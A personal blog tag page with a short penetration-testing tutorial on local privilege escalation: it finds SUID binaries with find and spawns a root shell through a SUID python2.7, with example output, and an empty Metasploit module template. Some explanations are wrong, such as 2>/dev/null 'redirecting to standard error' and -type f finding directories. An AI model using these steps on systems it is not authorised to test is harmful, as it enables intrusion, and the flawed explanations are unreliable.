exploit – kevindicks.co.uk

During the attacking phase of a pen test once access has been gained to a shell, we can try to own the system through a privilege escalation exploit in order to obtain root access. We can verify the system identification of the user by using the following command to ascertain SUID permissions:

$ id uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

Then we can use the following command, to find a list of executable file SUID permissions on the system:

find / -perm -u=s -type f 2>/dev/null

Here, the find command will search from root (/) looking for user SUID permissions configured to execute (-perm -u=s), and to find directories (-type f). The result of this search, will be redirected to standard error and use a null device to suppress output (2>/dev/null).

Example show below:

$ find / -perm -u=s 2>/dev/null /sbin/mount.nfs /usr/sbin/exim4 /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/python2.7 /usr/bin/chsh /usr/bin/at /usr/bin/mawk /usr/bin/chfn /usr/bin/procmail /usr/bin/passwd /bin/su /bin/umount /bin/mount

Note that if redirect to stdout (>) or (1>) was used instead of stderr (2>), we would see a list of permission denied errors. As given from the above example, we could look to use Python2.7 binary in an attempt to gain root access using a privilege escalation exploit. We can use the following command to achieve this in using our above example:

/usr/bin/python2.7 -c ‘import pty;pty.spawn(“/bin/sh”)’

This command will get a TTY shell after a reverse shell connection using Python2.7. This should result in the system permitting root access, and this can be seen from the following commands:

# id uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth) # whoami root

We can see that the system user now has root access, denoted from the above by euid=0(root) and root identified from whoami command.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##


require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  def initialize(info={})
    super(update_info(info,
      'Name'           => "[Vendor] [Software] [Root Cause] [Vulnerability type]",

      'Description'    => %q{

        Say something that the user might need to know

      },

      'License'        => MSF_LICENSE,

      'Author'         => [ 'Name' ],

      'References'     =>

        [

          [ 'URL', '' ]

        ],

      'Platform'       => 'win',

      'Targets'        =>

        [

          [ 'System or software version',

            {

              'Ret' => 0x41414141 # This will be available in `target.ret`

            }

          ]

        ],

      'Payload'        =>

        {

          'BadChars' => "\x00"

        },

      'Privileged'     => false,

      'DisclosureDate' => "",

      'DefaultTarget'  => 0))

  end
  def check

    # For the check command

  end
  def exploit

    # Main function

  end

end

M	T	W	T	F	S	S
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

Tag: exploit

Searching for binaries for privilege escalation exploit

Setting Up a Metasploit Development Environment

Exploit Ranking

How to get started with writing an exploit

Metasploit Exploit Module Template (Ruby)